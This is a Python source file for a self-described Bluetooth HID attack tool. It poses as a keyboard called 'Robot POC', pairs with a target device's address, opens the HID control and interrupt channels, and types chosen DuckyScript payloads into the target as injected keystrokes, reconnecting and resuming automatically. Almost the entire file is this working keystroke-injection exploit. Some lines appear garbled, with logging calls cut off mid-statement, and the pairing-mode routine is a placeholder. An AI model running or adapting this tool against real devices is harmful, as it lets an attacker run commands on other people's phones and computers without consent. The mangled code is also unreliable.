import binascii, bluetooth, sys, time, datetime, logging, argparse from multiprocessing import Process from pydbus import SystemBus from enum import Enum import os from utils.menu_functions import (main_menu, read_duckyscript, run, restart_bluetooth_daemon, get_target_address) from utils.register_device import register_hid_profile, agent_loop child_processes = [] # ANSI escape sequences for colors class AnsiColorCode: RED = '\033[91m' GREEN = '\033[92m' YELLOW = '\033[93m' BLUE = '\033[94m' MAGENTA = '\033[95m' CYAN = '\033[96m' WHITE = '\033[97m' RESET = '\033[0m' # Custom log level NOTICE_LEVEL = 25 # Custom formatter class with added color for NOTICE class ColorLogFormatter(logging.Formatter): COLOR_MAP = { logging.DEBUG: AnsiColorCode.BLUE, logging.INFO: AnsiColorCode.GREEN, logging.WARNING: AnsiColorCode.YELLOW, logging.ERROR: AnsiColorCode.RED, logging.CRITICAL: AnsiColorCode.MAGENTA, NOTICE_LEVEL: AnsiColorCode.CYAN, # Color for NOTICE level } def format(self, record): color = self.COLOR_MAP.get(record.levelno, AnsiColorCode.WHITE) message = super().format(record) return f'{color}{message}{AnsiColorCode.RESET}' # Method to add to the Logger class def notice(self, message, *args, **kwargs): if self.isEnabledFor(NOTICE_LEVEL): self._log(NOTICE_LEVEL, message, args, **kwargs) # Adding custom level and method to logging logging.addLevelName(NOTICE_LEVEL, "NOTICE") logging.Logger.notice = notice # Set up logging with color formatter and custom level def setup_logging(): log_format = "%(asctime)s - %(levelname)s - %(message)s" formatter = ColorLogFormatter(log_format) handler = logging.StreamHandler() handler.setFormatter(formatter) # Set the logging level to INFO to filter out DEBUG messages logging.basicConfig(level=logging.INFO, handlers=[handler]) class ConnectionFailureException(Exception): pass class Adapter: def __init__(self, iface): self.iface = iface self.bus = SystemBus() self.adapter = self._get_adapter(iface) def _get_adapter(self, iface): try: return self.bus.get("org.bluez", f"/org/bluez/{iface}") except KeyError: log.error(f"Unable to find adapter '{iface}', aborting.") raise ConnectionFailureException("Adapter not found") def _run_command(self, command): result = run(command) if result.returncode != 0: raise ConnectionFailureException(f"Failed to execute command: {' '.join(command)}. Error: {result.stderr}") def set_property(self, prop, value): # Convert value to string if it's not value_str = str(value) if not isinstance(value, str) else value command = ["sudo", "hciconfig", self.iface, prop, value_str] self._run_command(command) # Verify if the property is set correctly verify_command = ["hciconfig", self.iface, prop] verification_result = run(verify_command) if value_str not in verification_result.stdout: log.error(f"Unable to set adapter {prop}, aborting. Output: {verification_result.stdout}") raise ConnectionFailureException(f"Failed to set {prop}") def power(self, powered): self.adapter.Powered = powered def reset(self): self.power(False) self.power(True) def enable_ssp(self): try: # Command to enable SSP - the actual command might differ # This is a placeholder command and should be replaced with the actual one. ssp_command = ["sudo", "hciconfig", self.iface, "sspmode"] ssp_result = run(ssp_command) if ssp_result.returncode != 0: log.error(f"Failed to enable SSP: {ssp_result.stderr}") raise ConnectionFailureException("Failed to enable SSP") except Exception as e: log.error(f"Error enabling SSP: {e}") raise class PairingAgent: def __init__(self, iface, target_addr): self.iface = iface self.target_addr = target_addr dev_name = "dev_%s" % target_addr.upper().replace(":", "_") self.target_path = "/org/bluez/%s/%s" % (iface, dev_name) def __enter__(self): try: log.debug("Starting agent process...") self.agent = Process(target=agent_loop, args=(self.target_path,)) self.agent.start() time.sleep(0.25) log.debug("Agent process started.") return self except Exception as e: log.error(f"Error starting agent process: {e}") raise def __exit__(self, exc_type, exc_val, exc_tb): try: log.debug("Terminating agent process...") self.agent.kill() time.sleep(2) log.debug("Agent process terminated.") except Exception as e: log.error(f"Error terminating agent process: {e}") raise class L2CAPConnectionManager: def __init__(self, target_address): self.target_address = target_address self.clients = {} def create_connection(self, port): client = L2CAPClient(self.target_address, port) self.clients[port] = client return client def connect_all(self): try: return sum(client.connect() for client in self.clients.values()) except ConnectionFailureException as e: log.error(f"Connection failure: {e}") raise def close_all(self): for client in self.clients.values(): client.close() # Custom exception to handle reconnection class ReconnectionRequiredException(Exception): def __init__(self, message, current_line=0, current_position=0): super().__init__(message) time.sleep(2) self.current_line = current_line self.current_position = current_position class L2CAPClient: def __init__(self, addr, port): self.addr = addr self.port = port self.connected = False self.sock = None def encode_keyboard_input(*args): keycodes = [] flags = 0 for a in args: if isinstance(a, Key_Codes): keycodes.append(a.value) elif isinstance(a, Modifier_Codes): flags |= a.value assert(len(keycodes) <= 7) keycodes += [0] * (7 - len(keycodes)) report = bytes([0xa1, 0x01, flags, 0x00] + keycodes) return report def close(self): if self.connected: self.sock.close() self.connected = False self.sock = None def reconnect(self): # Notify the main script or trigger a reconnection process raise ReconnectionRequiredException("Reconnection required") def send(self, data): if not self.connected: log.error("[TX] Not connected") self.reconnect() # Get the current timestamp timestamp ="%Y-%m-%d %H:%M:%S.%f")[:-3] # Add the timestamp to your log message log.debug(f"[{timestamp}][TX-{self.port}] Attempting to send data: {binascii.hexlify(data).decode()}") try: self.attempt_send(data) log.debug(f"[TX-{self.port}] Data sent successfully") except bluetooth.btcommon.BluetoothError as ex: log.error(f"[TX-{self.port}] Bluetooth error: {ex}") self.reconnect() self.send(data) # Retry sending after reconnection except Exception as ex: log.error(f"[TX-{self.port}] Exception: {ex}") raise def attempt_send(self, data, timeout=0.5): start = time.time() while time.time() - start < timeout: try: self.sock.send(data) return except bluetooth.btcommon.BluetoothError as ex: if ex.errno != 11: # no data available raise time.sleep(0.001) def recv(self, timeout=0): start = time.time() while True: raw = None if not self.connected: return None if self.sock is None: return None try: raw = self.sock.recv(64) if len(raw) == 0: self.connected = False return None log.debug(f"[RX-{self.port}] Received data: {binascii.hexlify(raw).decode()}") except bluetooth.btcommon.BluetoothError as ex: if ex.errno != 11: # no data available raise ex else: if (time.time() - start) < timeout: continue return raw def connect(self, timeout=None): log.debug(f"Attempting to connect to {self.addr} on port {self.port}")"connecting to %s on port %d" % (self.addr, self.port)) sock = bluetooth.BluetoothSocket(bluetooth.L2CAP) sock.settimeout(timeout) try: sock.connect((self.addr, self.port)) sock.setblocking(0) self.sock = sock self.connected = True log.debug("SUCCESS! connected on port %d" % self.port) except Exception as ex: self.connected = False log.error("ERROR connecting on port %d: %s" % (self.port, ex)) raise ConnectionFailureException(f"Connection failure on port {self.port}") return self.connected def send_keyboard_report(self, *args): self.send(self.encode_keyboard_input(*args)) def send_keypress(self, *args, delay=0.0001): if args: log.debug(f"Attempting to send... {args}") self.send(self.encode_keyboard_input(*args)) time.sleep(delay) # Send an empty report to release the key self.send(self.encode_keyboard_input()) time.sleep(delay) else: # If no arguments, send an empty report to release keys self.send(self.encode_keyboard_input()) time.sleep(delay) return True # Indicate successful send def send_keyboard_combination(self, modifier, key, delay=0.004): # Press the combination press_report = self.encode_keyboard_input(modifier, key) self.send(press_report) time.sleep(delay) # Delay to simulate key press # Release the combination release_report = self.encode_keyboard_input() self.send(release_report) time.sleep(delay) def process_duckyscript(client, duckyscript, current_line=0, current_position=0): client.send_keypress('') # Send empty report to ensure a clean start time.sleep(0.5) shift_required_characters = "!@#$%^&*()_+{}|:\"<>?ABCDEFGHIJKLMNOPQRSTUVWXYZ" try: for line_number, line in enumerate(duckyscript): if line_number < current_line: continue # Skip already processed lines if line_number == current_line and current_position > 0: line = line[current_position:] # Resume from the last position within the current line else: current_position = 0 # Reset position for new line line = line.strip()"Processing {line}") if not line or line.startswith("REM"): continue if line.startswith("TAB"): client.send_keypress(Key_Codes.TAB) if line.startswith("PRIVATE_BROWSER"): report = bytes([0xa1, 0x01, Modifier_Codes.CTRL.value | Modifier_Codes.SHIFT.value, 0x00, Key_Codes.n.value, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]) client.send(report) # Don't forget to send a release report afterwards release_report = bytes([0xa1, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]) client.send(release_report) if line.startswith("VOLUME_UP"): # Send GUI + V hid_report_gui_v = bytes.fromhex("a1010800190000000000") client.send(hid_report_gui_v) time.sleep(0.1) # Short delay client.send_keypress(Key_Codes.TAB) # Press UP while holding GUI + V hid_report_up = bytes.fromhex("a1010800195700000000") client.send(hid_report_up) time.sleep(0.1) # Short delayF # Release all keys hid_report_release = bytes.fromhex("a1010000000000000000") client.send(hid_report_release) if line.startswith("DELAY"): try: # Extract delay time from the line delay_time = int(line.split()[1]) # Assumes delay time is in milliseconds time.sleep(delay_time / 1000) # Convert milliseconds to seconds for sleep except ValueError: log.error(f"Invalid DELAY format in line: {line}") except IndexError: log.error(f"DELAY command requires a time parameter in line: {line}") continue # Move to the next line after the delay if line.startswith("STRING"): text = line[7:] for char_position, char in enumerate(text, start=1): log.notice(f"Attempting to send letter: {char}") # Process each character try: if char.isdigit(): key_code = getattr(Key_Codes, f"_{char}") client.send_keypress(key_code) elif char == " ": client.send_keypress(Key_Codes.SPACE) elif char == "[": client.send_keypress(Key_Codes.LEFTBRACE) elif char == "]": client.send_keypress(Key_Codes.RIGHTBRACE) elif char == ";": client.send_keypress(Key_Codes.SEMICOLON) elif char == "'": client.send_keypress(Key_Codes.QUOTE) elif char == "/": client.send_keypress(Key_Codes.SLASH) elif char == ".": client.send_keypress(Key_Codes.DOT) elif char == ",": client.send_keypress(Key_Codes.COMMA) elif char == "|": client.send_keypress(Key_Codes.PIPE) elif char == "-": client.send_keypress(Key_Codes.MINUS) elif char == "=": client.send_keypress(Key_Codes.EQUAL) elif char in shift_required_characters: key_code_str = char_to_key_code(char) if key_code_str: key_code = getattr(Key_Codes, key_code_str) client.send_keyboard_combination(Modifier_Codes.SHIFT, key_code) else: log.warning(f"Unsupported character '{char}' in Duckyscript") elif char.isalpha(): key_code = getattr(Key_Codes, char.lower()) if char.isupper(): client.send_keyboard_combination(Modifier_Codes.SHIFT, key_code) else: client.send_keypress(key_code) else: key_code = char_to_key_code(char) if key_code: client.send_keypress(key_code) else: log.warning(f"Unsupported character '{char}' in Duckyscript") current_position = char_position except AttributeError as e: log.warning(f"Attribute error: {e} - Unsupported character '{char}' in Duckyscript") elif any(mod in line for mod in ["SHIFT", "ALT", "CTRL", "GUI", "COMMAND", "WINDOWS"]): # Process modifier key combinations components = line.split() if len(components) == 2: modifier, key = components try: # Convert to appropriate enums modifier_enum = getattr(Modifier_Codes, modifier.upper()) key_enum = getattr(Key_Codes, key.lower()) client.send_keyboard_combination(modifier_enum, key_enum) log.notice(f"Sent combination: {line}") except AttributeError: log.warning(f"Unsupported combination: {line}") else: log.warning(f"Invalid combination format: {line}") elif line.startswith("ENTER"): client.send_keypress(Key_Codes.ENTER) # After processing each line, reset current_position to 0 and increment current_line current_position = 0 current_line += 1 except ReconnectionRequiredException: raise ReconnectionRequiredException("Reconnection required", current_line, current_position) except Exception as e: log.error(f"Error during script execution: {e}") def char_to_key_code(char): # Mapping for special characters that always require SHIFT shift_char_map = { '!': 'EXCLAMATION_MARK', '@': 'AT_SYMBOL', '#': 'HASHTAG', '$': 'DOLLAR', '%': 'PERCENT_SYMBOL', '^': 'CARET_SYMBOL', '&': 'AMPERSAND_SYMBOL', '*': 'ASTERISK_SYMBOL', '(': 'OPEN_PARENTHESIS', ')': 'CLOSE_PARENTHESIS', '_': 'UNDERSCORE_SYMBOL', '+': 'KEYPADPLUS', '{': 'LEFTBRACE', '}': 'RIGHTBRACE', ':': 'SEMICOLON', '\\': 'BACKSLASH', '"': 'QUOTE', '<': 'COMMA', '>': 'DOT', '?': 'QUESTIONMARK', 'A': 'a', 'B': 'b', 'C': 'c', 'D': 'd', 'E': 'e', 'F': 'f', 'G': 'g', 'H': 'h', 'I': 'i', 'J': 'j', 'K': 'k', 'L': 'l', 'M': 'm', 'N': 'n', 'O': 'o', 'P': 'p', 'Q': 'q', 'R': 'r', 'S': 's', 'T': 't', 'U': 'u', 'V': 'v', 'W': 'w', 'X': 'x', 'Y': 'y', 'Z': 'z', } return shift_char_map.get(char) # Key codes for modifier keys class Modifier_Codes(Enum): CTRL = 0x01 RIGHTCTRL = 0x10 SHIFT = 0x02 RIGHTSHIFT = 0x20 ALT = 0x04 RIGHTALT = 0x40 GUI = 0x08 WINDOWS = 0x08 COMMAND = 0x08 RIGHTGUI = 0x80 class Key_Codes(Enum): NONE = 0x00 a = 0x04 b = 0x05 c = 0x06 d = 0x07 e = 0x08 f = 0x09 g = 0x0a h = 0x0b i = 0x0c j = 0x0d k = 0x0e l = 0x0f m = 0x10 n = 0x11 o = 0x12 p = 0x13 q = 0x14 r = 0x15 s = 0x16 t = 0x17 u = 0x18 v = 0x19 w = 0x1a x = 0x1b y = 0x1c z = 0x1d _1 = 0x1e _2 = 0x1f _3 = 0x20 _4 = 0x21 _5 = 0x22 _6 = 0x23 _7 = 0x24 _8 = 0x25 _9 = 0x26 _0 = 0x27 ENTER = 0x28 ESCAPE = 0x29 BACKSPACE = 0x2a TAB = 0x2b SPACE = 0x2c MINUS = 0x2d EQUAL = 0x2e LEFTBRACE = 0x2f RIGHTBRACE = 0x30 CAPSLOCK = 0x39 VOLUME_UP = 0x3b VOLUME_DOWN = 0xee SEMICOLON = 0x33 COMMA = 0x36 PERIOD = 0x37 SLASH = 0x38 PIPE = 0x31 BACKSLASH = 0x31 GRAVE = 0x35 APOSTROPHE = 0x34 LEFT_BRACKET = 0x2f RIGHT_BRACKET = 0x30 DOT = 0x37 RIGHT = 0x4f LEFT = 0x50 DOWN = 0x51 UP = 0x52 # SHIFT KEY MAPPING EXCLAMATION_MARK = 0x1e AT_SYMBOL = 0x1f HASHTAG = 0x20 DOLLAR = 0x21 PERCENT_SYMBOL = 0x22 CARET_SYMBOL = 0x23 AMPERSAND_SYMBOL = 0x24 ASTERISK_SYMBOL = 0x25 OPEN_PARENTHESIS = 0x26 CLOSE_PARENTHESIS = 0x27 UNDERSCORE_SYMBOL = 0x2d QUOTE = 0x34 QUESTIONMARK = 0x38 KEYPADPLUS = 0x57 def terminate_child_processes(): for proc in child_processes: if proc.is_alive(): proc.terminate() proc.join() def setup_bluetooth(target_address, adapter_id): restart_bluetooth_daemon() profile_proc = Process(target=register_hid_profile, args=(adapter_id, target_address)) profile_proc.start() child_processes.append(profile_proc) adapter = Adapter(adapter_id) adapter.set_property("name", "Robot POC") adapter.set_property("class", 0x002540) adapter.power(True) return adapter def initialize_pairing(agent_iface, target_address): try: with PairingAgent(agent_iface, target_address) as agent: log.debug("Pairing agent initialized") except Exception as e: log.error(f"Failed to initialize pairing agent: {e}") raise ConnectionFailureException("Pairing agent initialization failed") def establish_connections(connection_manager): if not connection_manager.connect_all(): raise ConnectionFailureException("Failed to connect to all required ports") def setup_and_connect(connection_manager, target_address, adapter_id): connection_manager.create_connection(1) # SDP connection_manager.create_connection(17) # HID Control connection_manager.create_connection(19) # HID Interrupt initialize_pairing(adapter_id, target_address) establish_connections(connection_manager) return connection_manager.clients[19] # Main function def main(): parser = argparse.ArgumentParser(description="Bluetooth HID Attack Tool") parser.add_argument('--adapter', type=str, default='hci0', help='Specify the Bluetooth adapter to use (default: hci0)') args = parser.parse_args() adapter_id = args.adapter main_menu() target_address = get_target_address() if not target_address:"No target address provided. Exiting.") return script_directory = os.path.dirname(os.path.realpath(__file__)) payload_folder = os.path.join(script_directory, 'payloads/') # Specify the relative path to the payloads folder. payloads = os.listdir(payload_folder) print("\nAvailable payloads:") for idx, payload_file in enumerate(payloads, 1): # Check and enumerate the files inside the payload folder. print(f"{idx}: {payload_file}") payload_choice = input("\nEnter the number of the payload you want to load: ") selected_payload = None try: payload_index = int(payload_choice) - 1 selected_payload = os.path.join(payload_folder, payloads[payload_index]) except (ValueError, IndexError): print("Invalid payload choice. No payload selected.") if selected_payload is not None: print(f"Selected payload: {selected_payload}") duckyscript = read_duckyscript(selected_payload) else: print("No payload selected.") if not duckyscript:"Payload file not found. Exiting.") return adapter = setup_bluetooth(target_address, adapter_id) adapter.enable_ssp() current_line = 0 current_position = 0 connection_manager = L2CAPConnectionManager(target_address) while True: try: hid_interrupt_client = setup_and_connect(connection_manager, target_address, adapter_id) process_duckyscript(hid_interrupt_client, duckyscript, current_line, current_position) time.sleep(2) break # Exit loop if successful except ReconnectionRequiredException as e:"Reconnection required. Attempting to reconnect...") current_line = e.current_line current_position = e.current_position connection_manager.close_all() # Sleep before retrying to avoid rapid reconnection attempts time.sleep(2) #process_duckyscript(hid_interrupt_client, duckyscript) if __name__ == "__main__": setup_logging() log = logging.getLogger(__name__) try: main() finally: terminate_child_processes()